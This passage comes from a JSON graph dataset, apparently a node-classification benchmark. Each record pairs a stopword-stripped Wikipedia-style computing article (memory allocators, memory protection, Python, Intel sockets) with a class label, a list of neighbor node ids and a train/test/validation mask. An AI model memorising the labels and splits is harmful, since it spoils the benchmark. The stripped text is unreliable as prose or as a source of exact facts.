double-linked list chunks pointers stored unallocated space inside chunk requests 256 bytes smallbin request simple two power best fit allocator used free blocks bin block next highest bin split two requests 256 bytes mmap threshold recent versions dlmalloc use in-place bitwise trie algorithm free space left satisfy request dlmalloc tries increase size heap usually via brk system call requests mmap threshold largebin request memory always allocated using mmap system call threshold usually 256 kb mmap method averts problems huge buffers trapping small allocation end expiration always allocates entire page memory many architectures 4096 bytes size since freebsd 7.0 netbsd 5.0 old codice_2 implementation phkmalloc replaced jemalloc written jason evans main reason lack scalability phkmalloc terms multithreading order avoid lock contention jemalloc uses separate arenas cpu experiments measuring number allocations per second multithreading application shown makes scale linearly number threads phkmalloc dlmalloc performance inversely proportional number threads openbsd implementation codice_2 function makes use mmap requests greater size one page entire allocation retrieved using codice_52 smaller sizes assigned memory pools maintained codice_2 within number bucket pages also allocated codice_52 call codice_7 memory released unmapped process address space using codice_56 system designed improve security taking advantage address space layout randomization gap page features implemented part openbsd codice_52 system call detect use-after-free bugs—as large memory allocation completely unmapped freed use causes segmentation fault termination program hoard allocator whose goal scalable memory allocation performance like openbsd allocator hoard uses codice_52 exclusively manages memory chunks 64 kilobytes called superblocks hoard heap logically divided single global heap number per-processor heaps addition thread-local cache hold limited number superblocks allocating superblocks local per-thread per-processor heap moving mostly-empty superblocks global heap reused processors hoard keeps fragmentation low achieving near linear scalability number threads every thread local storage small allocations large allocations mmap sbrk used tcmalloc malloc developed google garbage-collection local storage dead threads tcmalloc considered twice fast glibc ptmalloc multithreaded programs operating system kernels need allocate memory application programs implementation codice_2 within kernel often differs significantly implementations used c libraries however example memory buffers might need conform special restrictions imposed dma memory allocation function might called interrupt context necessitates codice_2 implementation tightly integrated virtual memory subsystem operating system kernel codice_2 relatives strong impact performance program uncommon override functions specific application custom implementations optimized application allocation patterns c standard provides way operating systems found various ways exploiting dynamic linking one way simply link different library override symbols another employed unix system v.3 make codice_2 codice_7 function pointers application reset custom functions largest possible memory block codice_2 allocate depends host system particularly size physical memory operating system implementation theoretically largest number maximum value held codice_65 type implementation-dependent unsigned integer representing size area memory c99 standard later available codice_66 constant codice_67 although guaranteed iso c usually c library implementations shipping various operating systems compilers may come alternatives extensions standard codice_2 package notable among",
    "neighbors": [
      2304,
      9482,
      4747,
      8975,
      5008,
      9490,
      11539,
      7702,
      1435,
      541,
      3871,
      7071,
      10143,
      1954,
      2605,
      814,
      5165,
      5040,
      9008,
      2995,
      7479,
      3512,
      5176,
      2625,
      1474,
      2627,
      6338,
      8773,
      1736,
      4424,
      6730,
      4173,
      6221,
      5840,
      5074,
      8531,
      468,
      6868,
      86,
      9559,
      5080,
      11219,
      4572,
      10333,
      5598,
      1247,
      7139,
      8573,
      10470,
      8551,
      2152,
      7933,
      7403,
      6640,
      2035,
      634,
      2045,
      7039
    ],
    "mask": "None"
  },
  {
    "node_id": 8546,
    "label": 2,
    "text": "Light_Weight_Kernel_Threads:light weight kernel threads light weight kernel threads lwkt computer science term dragonflybsd particular lwkts differ normal kernel threads preempt normal kernel threads according matt dillon dragonflybsd creator",
    "neighbors": [
      1891,
      1637,
      7983,
      274,
      850,
      11698,
      2168,
      4571,
      3197
    ],
    "mask": "Test"
  },
  {
    "node_id": 8547,
    "label": 7,
    "text": "Big_V_Telecom:big v telecom big v telecom indian cloud telephony company serves direct clients also works partnership network franchises company first incubated tata elxsi 2013 part 140 billion tata group based pune india big v telecom founded keshor daga 2008 flagship product yocc contact centre 2012 part company corporate social responsibility drive big v telecom established call anna virtual contact centre anti-corruption activist anna hazare indian anti-corruption movement 2012 big v telecom partnered western central railways providing 131 railway enquiry number firm also partnered bsnl providing value added services maharashtra august 2015 firm launched product named voter first propagated india first voter engagement issue resolution application custom built politicians interact constituents download android ios stores reports suggest voter first name sub-division big v telecom firm name appear app stores instead politician apps appear respective names picture identity mobile app firm past also partnered tv18 commoditycontrol.com providing on-spot updates commodity rates via phone calls consumers self-funded company recently announced looking venture capital funding expansion within outside india ndtv profit business services excellence award innovative franchise business service sector 2010 aegis graham bell award innovative managed services 2012 tata elxsi takes big v telecom incubator programme tata elxsi incubates big v telecom tata elxsi picks big v telecom first startup new incub te program tata elxsi sets business incubator cloud telephony firm big v telecom looking raise 6.5m funding big v telecom incubated tata elxsi expands footprints delhi/ncr big v telecom incubated tata elxsi expands footprints delhi/ncr big v telecom incubated tata elxsi expands footprints delhi/ncr",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8548,
    "label": 4,
    "text": "Chinese_National_Vulnerability_Database:chinese national vulnerability database chinese national vulnerability database cnnvd people republic china nstional vulnerability database maintained chinese ministry state security",
    "neighbors": [
      2558,
      2446
    ],
    "mask": "Test"
  },
  {
    "node_id": 8549,
    "label": 9,
    "text": "Ballerina_(programming_language):ballerina programming language ballerina general-purpose programming language features optimized network distributed applications easy write modify suitable application programmers open source project started 2015 architects wso2 code-based alternative configuration-based integration tools eai esb workflow products ballerina various constructs geared toward cloud-native development including support modern data formats protocols reliability distributed transactions apis event streams simple hello world service depicted // start service navigate directory contains // .bal file execute ballerina run command import ballerina/http import ballerina/log service hello new http listener 9090 print “ hello world ” parallel using workers import ballerina/io public function main",
    "neighbors": [
      3462,
      8582,
      10387,
      1435,
      668,
      9245,
      7326,
      3876,
      4777,
      5677,
      7983,
      6074,
      6718,
      8644,
      8262,
      5833,
      8524,
      7889,
      11219,
      11221,
      2519,
      477,
      6502,
      10470,
      8554,
      5612,
      10991,
      3960,
      3705,
      7292,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8550,
    "label": 4,
    "text": "Mohamed_Elnoby:mohamed elnoby mohamed abdelbasset elnouby famous egyptian programmer information security specialist one famous white hat arabic hackers start point 2013 penetrated discovered vulnerabilitya facebook resulted website gave reward focused name many arabic global media channels paid big attention also discovered many vulnerabilities many famous global websites like google yahoo amazon adobe others honored effort plus adding name add value hall fame list white hat security experts 20 global websites founder member chief technonogy officer google business community upper egypt ex general moderator arabic version foursquare app facebook added name hall fame list white hat security experts 2013 2014 2015 2016 row born 1988 esna qena upper egypt graduated faculty tourism hotels elmenia university started working programming computer networks field since 1999 code name facebook symbiansymoh worked many organizations like s3geeks cooperated volunteering works like arabization famous social media website twitter also worked general moderator arabic version foursquare app working freelance programmer chief technonogy officer google business community upper egypt took first step penetration hacking others computers stealing accounts turned moral hacker call white hat hacker start point discovering vulnerability famous website facebook got financial reward plus adding name honor list white hat security experts continued discovering vulnerabilities till got 5 ones processes vulnerabilities discovery global websites continued till got 22 websites famous hunter vulnerabilities rewards",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 8551,
    "label": 2,
    "text": "Memory_protection:memory protection memory protection way control memory access rights computer part modern instruction set architectures operating systems main purpose memory protection prevent process accessing memory allocated prevents bug malware within process affecting processes operating system protection may encompass accesses specified area memory write accesses attempts execute contents area attempt access unowned memory results hardware fault called segmentation fault storage violation exception generally causing abnormal termination offending process memory protection computer security includes additional techniques address space layout randomization executable space protection segmentation refers dividing computer memory segments reference memory location includes value identifies segment offset within segment x86 architecture multiple segmentation features helpful using protected memory architecture x86 architecture global descriptor table local descriptor tables used reference segments computer memory pointers memory segments x86 processors also stored processor segment registers initially x86 processors 4 segment registers cs code segment ss stack segment ds data segment es extra segment later another two segment registers added – fs gs paging memory address space divided equal-sized blocks called pages using virtual memory hardware page reside location computer physical memory flagged protected virtual memory makes possible linear virtual memory address space use access blocks fragmented physical memory address space computer architectures support paging also use pages basis memory protection page table maps virtual memory physical memory page table usually invisible process page tables make easier allocate additional memory new page allocated anywhere physical memory impossible application access page explicitly allocated every memory address either points page allocated application generates interrupt called page fault unallocated pages pages allocated application addresses application point view page fault may necessarily indicate error page faults used memory protection operating system may manage page table way reference page previously swapped disk causes page fault operating system intercepts page fault loads required memory page application continues fault occurred scheme known virtual memory allows in-memory data currently use moved disk storage back way transparent applications increase overall memory capacity systems page fault mechanism also used executable space protection w^x memory protection key mpk mechanism divides physical memory blocks particular size e.g. 4 kib associated numerical value called protection key process also protection key value associated memory access hardware checks current process protection key matches value associated memory block accessed exception occurs mechanism introduced system/360 architecture available today system z mainframes heavily used system z operating systems subsystems system/360 protection keys described associated physical addresses different protection key mechanism used architectures hewlett-packard/intel ia-64 hewlett-packard pa-risc associated virtual addresses allow multiple keys per process itanium pa architectures translations tlb entries keys itanium access ids pa associated running process several protection key registers 16 itanium 4 hp/pa translation selected virtual address key compared protection key registers match plus possible checks access permitted none match fault exception generated software fault handler desired check missing key larger list keys maintained software thus protection key registers inside processor may treated software-managed cache larger list keys associated process pa 15–18 bits key itanium mandates least 18 keys usually associated protection domains libraries modules etc x86 protection keys architecture allows tagging virtual addresses user pages 16 protection keys pages tagged protection key constitute protection domain new register contains permissions associated protection domain load store operations checked page table permissions protection key permissions associated protection domain virtual address allowed permissions allow access protection key permissions set user space allowing applications directly restrict access application data without os intervention since protection keys associated virtual address protection domains per address space processes running different address spaces use 16 domains simulation use monitoring program interpret machine code instructions computer architectures instruction set simulator provide memory protection using segmentation-like scheme validating target address length instruction real time actually executing simulator must calculate target address length compare list valid address ranges holds concerning thread environment dynamic memory blocks acquired since thread inception plus valid shared static memory slots meaning valid may change throughout thread life depending upon context may sometimes allowed alter static block storage sometimes depending upon current mode execution may may depend storage key supervisor state generally advisable use method memory protection adequate facilities exist cpu takes valuable processing power computer however generally used debugging testing purposes provide extra fine level granularity otherwise generic storage violations indicate precisely instruction attempting overwrite particular section storage may storage key unprotected storage capability-based addressing method memory protection unused modern commercial computers method pointers replaced protected objects called capabilities created using privileged instructions may executed kernel process authorized effectively lets kernel control processes may access objects memory need use separate address spaces context switches commercial products used capability based security plessey system 250 ibm system/38 intel iapx 432 architecture keykos capability approaches widely used research systems eros combex darpa browser used conceptually basis virtual machines notably smalltalk java currently darpa-funded cheri project university cambridge working create modern capability machine also supports legacy software dynamic tainting technique protecting programs illegal memory accesses memory allocated runtime technique taints memory corresponding pointer using taint mark taint marks suitably propagated program executes checked every time memory address accessed pointer p taint marks associated p differ execution stopped illegal access reported sparc m7 processors higher implement dynamic tainting hardware oracle markets feature silicon secured memory ssm previously branded application data integrity adi lowrisc cpu design includes dynamic tainting name tagged memory protection level particular implementation may measured closely adheres principle minimum privilege different operating systems use different forms memory protection separation although memory protection common mainframes many minicomputer systems 1960s true memory separation used home computer operating systems os/2 risc os released 1987 prior systems lack protection even used form interprocess communication sending pointer processes possible processes access system memory windows 9x family operating systems operating systems implement memory protection include unix-like systems codice_1 system call used control memory protection",
    "neighbors": [
      2560,
      6155,
      3603,
      6675,
      7187,
      10776,
      25,
      4637,
      3615,
      9762,
      4643,
      6180,
      5158,
      3624,
      7217,
      10803,
      1592,
      5176,
      9784,
      10809,
      576,
      2625,
      8259,
      8773,
      6730,
      6221,
      1614,
      10835,
      3160,
      2653,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      7804,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      4773,
      6311,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      9919,
      8388,
      1736,
      2248,
      9932,
      5840,
      6868,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      5358,
      1776,
      8944,
      242,
      5363,
      9466,
      2811,
      9468,
      9978,
      1278,
      10499,
      5384,
      1801,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      1820,
      3871,
      10016,
      292,
      6950,
      10235,
      2345,
      7471,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      4424,
      5452,
      6988,
      11596,
      5457,
      11601,
      7507,
      341,
      7511,
      5976,
      7515,
      10590,
      8545,
      3426,
      11106,
      5484,
      2925,
      7020,
      11123,
      5492,
      2933,
      11635,
      1399,
      376,
      8573,
      5503,
      7039,
      8063,
      9599,
      10113,
      8069,
      2951,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      1462,
      6075,
      6078,
      9151,
      11204,
      11205,
      3014,
      6087,
      4040,
      8136,
      9166,
      7631,
      9171,
      9685,
      7134,
      8167,
      10730,
      10731,
      8687,
      6128,
      5105,
      499,
      5619,
      5115,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8552,
    "label": 3,
    "text": "LGA_1150:lga 1150 lga 1150 also known socket h3 microprocessor socket used intel central processing units cpus built haswell microarchitecture socket also used haswell successor broadwell microarchitecture successor lga 1155 succeeded lga 1151 2016 motherboards lga 1150 socket support varying video outputs vga dvi hdmi depending model intel clear video technology intel platform controller hub pch lga 1150 cpus codenamed lynx point intel xeon processors socket lga 1150 use intel c222 c224 c226 chipsets 4 holes fastening heatsink motherboard placed square lateral length 75 mm intel sockets lga 1156 lga 1155 lga 1150 lga 1151 cooling solutions therefore interchangeable may 12 2014 intel announced release two 9-series chipsets h97 z97 differences new features two chipsets compared h87 z87 counterparts following motherboards based h97 z97 chipsets available purchase day chipsets announced",
    "neighbors": [
      3588,
      5901,
      398,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      8625,
      9649,
      4537,
      2237,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      10715,
      2525,
      11484,
      9570,
      10468,
      613,
      1515,
      1260,
      4717,
      4334,
      1776,
      10225,
      371,
      9592,
      4217,
      8442
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8553,
    "label": 2,
    "text": "Interactive_Systems_Corporation:interactive systems corporation interactive systems corporation styled interactive systems corporation abbreviated isc us-based software company first vendor unix operating system outside operating santa monica california founded 1977 peter g. weiner rand corporation researcher previously founded yale university computer science department ph d. advisor brian kernighan one unix developers weiner joined heinz lycklama also veteran previously author version 6 unix port lsi-11 computer isc acquired eastman kodak company 1988 sold isc unix operating system assets sun microsystems september 26 1991 kodak sold remaining parts isc shl systemhouse inc 1993 several former isc staff founded segue software partnered lotus development develop unix version lotus 1-2-3 peter norton computing develop unix version norton utilities isc 1977 offering is/1 version 6 unix variant enhanced office automation running pdp-11 is/3 is/5 enhanced versions unix system iii system v pdp-11 vax isc unix ports ibm pc included variant system iii developed contract ibm known pc/ix personal computer interactive executive also abbreviated pc-ix later versions branded 386/ix finally interactive unix system v/386 based system v release 3.2 isc principal publisher system v.4 intel platform isc also involved development vm/ix unix guest os vm/370 enhancements ix/370 tss/370-based unix system ibm originally developed jointly ca.1980 also developed aix 1.0 advanced interactive executive ibm rt pc contract ibm although ibm awarded development contract aix version 2 aix/386 aix/370 competing locus computing corporation although observers early 1980s expected ibm would choose microsoft xenix version corporation unix microcomputer pc/ix first unix implementation ibm pc xt available directly ibm according bob blake pc/ix product manager ibm primary objective make credible unix system ... try 'ibm-ize product pc-ix system iii unix pc/ix however first unix port xt venix/86 preceded pc/ix year although based older version 7 unix main addition pc/ix ined screen editor isc ined offered multiple windows context-sensitive help paragraph justification margin changes although fully fledged word processor pc/ix omitted system iii fortran compiler tar file archiver add bsd tools like vi c shell one reason porting pc/ix individual applications limited single segment 64 kb ram achieve good filesystem performance pc/ix directly addressed xt hard-drive rather bios gave significant speed advantage compared ms-dos lack true memory protection 8088 chips ibm sold single-user licenses pc/ix pc/ix distribution came 19 floppy disks accompanied 1,800-page manual installed pc/ix took approximately 4.5 mb disk space editorial bill machrone pc magazine time pc/ix launch flagged 900 price show stopper given lack compatibility ms-dos applications pc/ix commercial success although byte august 1984 described complete usable single-user implementation done 8088 noting pc/ix pc outperformed venix pdp-11/23 pc/ix succeeded 386/ix 1985 system vr3 derivative later versions termed interactive unix system v/386 based system v 3.2 though elements bsd added svr3.2 kernel meant diminished compatibility unix ports early nineties interactive unix system praised pc magazine reviewer stability acquisition interactive sun microsystems continued maintain interactive unix system offering low-end alternative system v.4-based solaris even latter ported x86-based desktop machines last version system v/386 release 3.2 version 4.1.1 released july 1998 official support ended july 23 2006 five years sun withdrew product sale version isa 3.0.1 interactive unix system supported 16 mb ram next versions supported 256mb ram pci bus eisa versions always supported 256mb ram",
    "neighbors": [
      640,
      3488,
      9665,
      2179,
      6787,
      7460,
      9444,
      9829,
      1515,
      2995,
      5492,
      9141,
      11604,
      3323,
      9151
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8554,
    "label": 9,
    "text": "Python_(programming_language):python programming language python interpreted high-level general-purpose programming language created guido van rossum first released 1991 python design philosophy emphasizes code readability notable use significant whitespace language constructs object-oriented approach aim help programmers write clear logical code small large-scale projects python dynamically typed garbage-collected supports multiple programming paradigms including procedural object-oriented functional programming python often described batteries included language due comprehensive standard library python conceived late 1980s successor abc language python 2.0 released 2000 introduced features like list comprehensions garbage collection system capable collecting reference cycles python 3.0 released 2008 major revision language completely backward-compatible much python 2 code run unmodified python 3 due concern amount code written python 2 support python 2.7 last release 2.x series extended 2020 language developer guido van rossum shouldered sole responsibility project july 2018 shares leadership member five-person steering council python interpreters available many operating systems global community programmers develops maintains cpython open source reference implementation non-profit organization python software foundation manages directs resources python cpython development python conceived late 1980s guido van rossum centrum wiskunde informatica cwi netherlands successor abc language inspired setl capable exception handling interfacing amoeba operating system implementation began december 1989 van rossum continued python lead developer july 12 2018 announced permanent vacation responsibilities python benevolent dictator life title python community bestowed upon reflect long-term commitment project chief decision-maker january 2019 active python core developers elected brett cannon nick coghlan barry warsaw carol willing van rossum five-member steering council lead project python 2.0 released 16 october 2000 many major new features including cycle-detecting garbage collector support unicode python 3.0 released 3 december 2008 major revision language completely backward-compatible many major features backported python 2.6.x 2.7.x version series releases python 3 include codice_1 utility automates least partially translation python 2 code python 3 python 2.7 end-of-life date initially set 2015 postponed 2020 concern large body existing code could easily forward-ported python 3 january 2017 google announced work python 2.7 go transcompiler improve performance concurrent workloads python multi-paradigm programming language object-oriented programming structured programming fully supported many features support functional programming aspect-oriented programming including metaprogramming metaobjects magic methods many paradigms supported via extensions including design contract logic programming python uses dynamic typing combination reference counting cycle-detecting garbage collector memory management also features dynamic name resolution late binding binds method variable names program execution python design offers support functional programming lisp tradition codice_2 codice_3 codice_4 functions list comprehensions dictionaries sets generator expressions standard library two modules itertools functools implement functional tools borrowed haskell standard ml language core philosophy summarized document zen python pep 20 includes aphorisms rather functionality built core python designed highly extensible compact modularity made particularly popular means adding programmable interfaces existing applications van rossum vision small core language large standard library easily extensible interpreter stemmed frustrations abc espoused opposite approach python strives simpler less-cluttered syntax grammar giving developers choice coding methodology contrast perl one way motto python embraces one—and preferably one—obvious way design philosophy alex martelli fellow python software foundation python book author writes describe something 'clever considered compliment python culture python developers strive avoid premature optimization reject patches non-critical parts cpython reference implementation would offer marginal increases speed cost clarity speed important python programmer move time-critical functions extension modules written languages c use pypy just-in-time compiler cython also available translates python script c makes direct c-level api calls python interpreter important goal python developers keeping fun use reflected language name—a tribute british comedy group monty python—and occasionally playful approaches tutorials reference materials examples refer spam eggs famous monty python sketch instead standard foo bar common neologism python community pythonic wide range meanings related program style say code pythonic say uses python idioms well natural shows fluency language conforms python minimalist philosophy emphasis readability contrast code difficult understand reads like rough transcription another programming language called unpythonic users admirers python especially considered knowledgeable experienced often referred pythonists pythonistas pythoneers python meant easily readable language formatting visually uncluttered often uses english keywords languages use punctuation unlike many languages use curly brackets delimit blocks semicolons statements optional fewer syntactic exceptions special cases c pascal python uses whitespace indentation rather curly brackets keywords delimit blocks increase indentation comes certain statements decrease indentation signifies end current block thus program visual structure accurately represents program semantic structure feature also sometimes termed off-side rule python statements include among others python support tail call optimization first-class continuations according guido van rossum never however better support coroutine-like functionality provided 2.5 extending python generators 2.5 generators lazy iterators information passed unidirectionally generator python 2.5 possible pass information back generator function python 3.3 information passed multiple stack levels python expressions similar languages c java python distinction expressions statements rigidly enforced contrast languages common lisp scheme ruby leads duplicating functionality example statements part expression list comprehensions lambda expressions expressions contain statements particular case assignment statement codice_78 form part conditional expression conditional statement advantage avoiding classic c error mistaking assignment operator codice_79 equality operator codice_36 conditions codice_81 syntactically valid probably unintended c code codice_82 causes syntax error python methods objects functions attached object class syntax codice_83 normal methods functions syntactic sugar codice_84 python methods explicit codice_85 parameter access instance data contrast implicit codice_85 codice_87 object-oriented programming languages e.g. c++ java objective-c ruby python uses duck typing typed objects untyped variable names type constraints checked compile time rather operations object may fail signifying given object suitable type despite dynamically typed python strongly typed forbidding operations well-defined example adding number string rather silently attempting make sense python allows programmers define types using classes often used object-oriented programming new instances classes constructed calling class example codice_88 codice_89 classes instances metaclass codice_90 instance allowing metaprogramming reflection version 3.0 python two kinds classes old-style new-style syntax styles difference whether class codice_91 inherited directly indirectly new-style classes inherit codice_91 instances codice_90 versions python 2 python 2.2 onwards kinds classes used old-style classes eliminated python 3.0 long term plan support gradual typing python 3.5 syntax language allows specifying static types checked default implementation cpython experimental optional static type checker named mypy supports compile-time type checking python usual c language arithmetic operators codice_50 codice_95 codice_96 codice_33 codice_58 also codice_34 exponentiation e.g codice_100 codice_101 new matrix multiply codice_35 operator included version 3.5 additionally unary operator codice_103 essentially inverts bits one argument integers means codice_104 operators include bitwise shift operators codice_105 shifts codice_106 left codice_107 places codice_108 codice_109 shifts codice_106 right codice_107 places codice_112 behavior division changed significantly time division integers produces accurate floating point results rounding towards negative infinity though different languages adds consistency instance means equation codice_126 always true also means equation codice_127 valid positive negative values codice_128 however maintaining validity equation means result codice_129 expected half-open interval 0 b codice_130 positive integer lie interval b 0 codice_130 negative python provides codice_132 function rounding float nearest integer tie-breaking versions 3 use round-away-from-zero codice_133 1.0 codice_134 −1.0 python 3 uses round even codice_135 2 codice_136 2 python allows boolean expressions multiple equality relations manner consistent general use mathematics example expression codice_137 tests whether codice_128 less codice_130 codice_130 less codice_141 c-derived languages interpret expression differently c expression would first evaluate codice_142 resulting 0 1 result would compared codice_141 python extensive built-in support arbitrary precision arithmetic integers transparently switched machine-supported maximum fixed-precision usually 32 64 bits belonging python type codice_144 arbitrary precision belonging python type codice_145 needed latter l suffix textual representation python 3 distinction codice_144 codice_145 types eliminated behavior entirely contained codice_144 class codice_149 type/class module codice_150 since version 2.4 provides decimal floating point numbers arbitrary precision several rounding modes codice_151 type module codice_152 since version 2.6 provides arbitrary precision rational numbers due python extensive mathematics library third-party library numpy extends native capabilities frequently used scientific scripting language aid problems numerical data processing manipulation python large standard library commonly cited one greatest strengths provides tools suited many tasks internet-facing applications many standard formats protocols mime http supported includes modules creating graphical user interfaces connecting relational databases generating pseudorandom numbers arithmetic arbitrary precision decimals manipulating regular expressions unit testing parts standard library covered specifications example web server gateway interface wsgi implementation codice_153 follows pep 333 modules specified code internal documentation test suites supplied however standard library cross-platform python code modules need altering rewriting variant implementations python implementations including cpython include read–eval–print loop repl permitting function command line interpreter user enters statements sequentially receives results immediately shells including idle ipython add abilities auto-completion session state retention syntax highlighting well standard desktop integrated development environments web browser-based ides sagemath intended developing science math-related python programs pythonanywhere browser-based ide hosting environment canopy ide commercial python ide emphasizing scientific computing cpython reference implementation python written c meeting c89 standard several select c99 features compiles python programs intermediate bytecode executed virtual machine cpython distributed large standard library written mixture c native python available many platforms including windows modern unix-like systems platform portability one earliest priorities pypy fast compliant interpreter python 2.7 3.5 just-in-time compiler brings significant speed improvement cpython stackless python significant fork cpython implements microthreads use c memory stack thus allowing massively concurrent programs pypy also stackless version micropython circuitpython python 3 variants optimised microcontrollers includes lego mindstorms ev3 just-in-time python compilers developed unsupported 2005 nokia released python interpreter series 60 mobile phones named pys60 includes many modules cpython implementations additional modules integrate symbian operating system project kept up-to-date run variants s60 platform several third-party modules available nokia n900 also supports python gtk widget libraries enabling programs written run target device several compilers high-level object languages either unrestricted python restricted subset python language similar python source language performance comparison various python implementations non-numerical combinatorial workload presented euroscipy '13 python development conducted largely python enhancement proposal pep process primary mechanism proposing major new features collecting community input issues documenting python design decisions python coding style covered pep 8 outstanding peps reviewed commented python community steering council enhancement language corresponds development cpython reference implementation mailing list python-dev primary forum language development specific issues discussed roundup bug tracker maintained python.org development originally took place self-hosted source-code repository running mercurial python moved github january 2017 cpython public releases come three types distinguished part version number incremented many alpha beta release-candidates also released previews testing final releases although rough schedule release often delayed code ready python development team monitors state code running large unit test suite development using buildbot continuous integration system community python developers also contributed 86,000 software modules python package index pypi official repository third-party python libraries major academic conference python pycon also special python mentoring programmes pyladies python name derived british comedy group monty python python creator guido van rossum enjoyed developing language monty python references appear frequently python code culture example metasyntactic variables often used python literature spam eggs instead traditional foo bar official python documentation also contains various references monty python routines prefix py- used show something related python examples use prefix names python applications libraries include pygame binding sdl python commonly used create games pyqt pygtk bind qt gtk python respectively pypy python implementation originally written python python api documentation generators include since 2003 python consistently ranked top ten popular programming languages tiobe programming community index third popular language behind java c selected programming language year 2007 2010 2018 empirical study found scripting languages python productive conventional languages c java programming problems involving string manipulation search dictionary determined memory consumption often better java much worse c c++ large organizations use python include wikipedia google yahoo cern nasa facebook amazon instagram spotify smaller entities like ilm ita social news networking site reddit written entirely python python serve scripting language web applications e.g. via mod_wsgi apache web server web server gateway interface standard api evolved facilitate applications web frameworks like django pylons pyramid turbogears web2py tornado flask bottle zope support developers design maintenance complex applications pyjs ironpython used develop client-side ajax-based applications sqlalchemy used data mapper relational database twisted framework program communications computers used example dropbox libraries numpy scipy matplotlib allow effective use python scientific computing specialized libraries biopython astropy providing domain-specific functionality sagemath mathematical software notebook interface programmable python library covers many aspects mathematics including algebra combinatorics numerical mathematics number theory calculus python successfully embedded many software products scripting language including finite element method software abaqus 3d parametric modeler like freecad 3d animation packages 3ds max blender cinema 4d lightwave houdini maya modo motionbuilder softimage visual effects compositor nuke 2d imaging programs like gimp inkscape scribus paint shop pro musical notation programs like scorewriter capella gnu debugger uses python pretty printer show complex structures c++ containers esri promotes python best choice writing scripts arcgis also used several video games adopted first three available programming languages google app engine two java go python commonly used artificial intelligence projects help libraries like tensorflow keras scikit-learn scripting language modular architecture simple syntax rich text processing tools python often used natural language processing many operating systems include python standard component ships linux distributions amigaos 4 freebsd package netbsd openbsd package macos used command line terminal many linux distributions use installers written python ubuntu uses ubiquity installer red hat linux fedora use anaconda installer gentoo linux uses python package management system portage python used extensively information security industry including exploit development sugar software one laptop per child xo developed sugar labs written python raspberry pi single-board computer project adopted python main user-programming language libreoffice includes python intends replace java python python scripting provider core feature since version 4.0 7 february 2013 python design philosophy influenced many programming languages python development practices also emulated languages example practice requiring document describing rationale issues surrounding change language python pep also used tcl erlang python received tiobe programming language year awards 2007 2010 2018 award given language greatest growth popularity year measured tiobe index",
    "neighbors": [
      0,
      8201,
      6154,
      10250,
      2062,
      4112,
      6160,
      19,
      2069,
      8213,
      8221,
      6176,
      6177,
      6191,
      8240,
      50,
      8244,
      2105,
      58,
      8262,
      74,
      4171,
      6219,
      6227,
      84,
      6228,
      4182,
      6233,
      10340,
      102,
      4200,
      8297,
      8303,
      8304,
      113,
      8323,
      2181,
      2186,
      8331,
      10387,
      148,
      155,
      4255,
      2217,
      10413,
      6319,
      8378,
      190,
      6335,
      8385,
      6338,
      10435,
      6345,
      2250,
      8397,
      4302,
      10447,
      8408,
      6361,
      219,
      228,
      10469,
      10470,
      231,
      4327,
      2281,
      10474,
      237,
      10478,
      240,
      8433,
      10480,
      4341,
      8447,
      256,
      2304,
      8454,
      263,
      10506,
      10511,
      10520,
      8473,
      282,
      8476,
      10526,
      8479,
      6433,
      295,
      6443,
      6446,
      303,
      8495,
      6450,
      4410,
      6458,
      10555,
      10565,
      8520,
      10571,
      8524,
      333,
      335,
      337,
      338,
      2387,
      8531,
      10581,
      10584,
      10586,
      8539,
      349,
      6493,
      2401,
      8549,
      6502,
      10617,
      6523,
      2432,
      386,
      4485,
      6534,
      8582,
      6536,
      4501,
      10649,
      6555,
      10654,
      416,
      8609,
      418,
      8618,
      428,
      10670,
      2481,
      4529,
      10683,
      6594,
      8644,
      6597,
      4550,
      462,
      463,
      2519,
      477,
      479,
      4576,
      10719,
      482,
      6626,
      6634,
      10732,
      10736,
      10738,
      8691,
      2548,
      10739,
      502,
      8699,
      2556,
      2557,
      8702,
      8718,
      4623,
      2576,
      8720,
      10771,
      2585,
      10780,
      541,
      8735,
      546,
      8738,
      8739,
      10786,
      2603,
      6701,
      564,
      2617,
      6718,
      8771,
      10819,
      8775,
      587,
      595,
      10841,
      8799,
      6753,
      2658,
      10851,
      10854,
      8810,
      6769,
      6774,
      2680,
      10889,
      4747,
      6797,
      8846,
      655,
      10900,
      8854,
      6810,
      4770,
      2723,
      4772,
      8866,
      8868,
      4775,
      6823,
      4777,
      6828,
      2739,
      692,
      8883,
      10939,
      4797,
      6847,
      4802,
      711,
      10952,
      10953,
      716,
      8909,
      8916,
      10964,
      4822,
      728,
      8921,
      6875,
      10971,
      741,
      4840,
      747,
      2795,
      10991,
      2810,
      764,
      8957,
      6910,
      11009,
      11017,
      8973,
      788,
      2836,
      4887,
      8986,
      6941,
      8990,
      11038,
      9001,
      2864,
      6962,
      820,
      823,
      2872,
      4919,
      6969,
      2880,
      847,
      6997,
      2903,
      4951,
      11098,
      4958,
      863,
      4961,
      9063,
      11112,
      7018,
      7020,
      7022,
      2930,
      7027,
      2936,
      11135,
      2955,
      908,
      2966,
      11161,
      7067,
      929,
      9121,
      2980,
      7076,
      934,
      5031,
      5032,
      9128,
      5037,
      2990,
      9150,
      963,
      11203,
      5067,
      11215,
      9170,
      5075,
      11219,
      11221,
      9177,
      9179,
      7140,
      5093,
      3051,
      7147,
      1016,
      9208,
      11257,
      11259,
      5117,
      5121,
      3076,
      9224,
      5130,
      9227,
      9229,
